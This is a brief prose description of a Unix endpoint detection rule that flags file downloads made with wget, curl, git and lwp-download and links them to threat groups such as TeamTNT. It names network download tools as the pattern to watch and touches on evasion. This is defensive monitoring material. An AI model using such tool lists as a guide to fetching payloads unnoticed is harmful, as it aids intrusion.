This detection rule is designed to monitor and identify file downloads on Unix-based systems. It targets activities primarily facilitated by file transfer tools like wget, curl, git, and lwp-download. The rule invokes the get_endpoint_data and get_endpoint_data_unix functions to collect data pertinent to these processes, filtering the output through regex to distinguish relevant commands. The process captures the URI path of files being downloaded, and correlates this with the filenames and the context of the command execution. Key metrics are collected, including the count of unique URI accesses and filenames, allowing analysts to pattern anomalies, such as unexpected file downloads or a high frequency of similar downloads. The logic accommodates potential evasion techniques by filtering out certain parameters that could indicate legitimate uploads rather than downloads. Notably, the detection leverages a rich understanding of various threat actors such as the 8220 Gang and TeamTNT, integrating insights into software associations linked to known threats. This makes it a valuable rule for cybersecurity professionals aiming to enhance endpoint security against potential data exfiltration or malicious activity.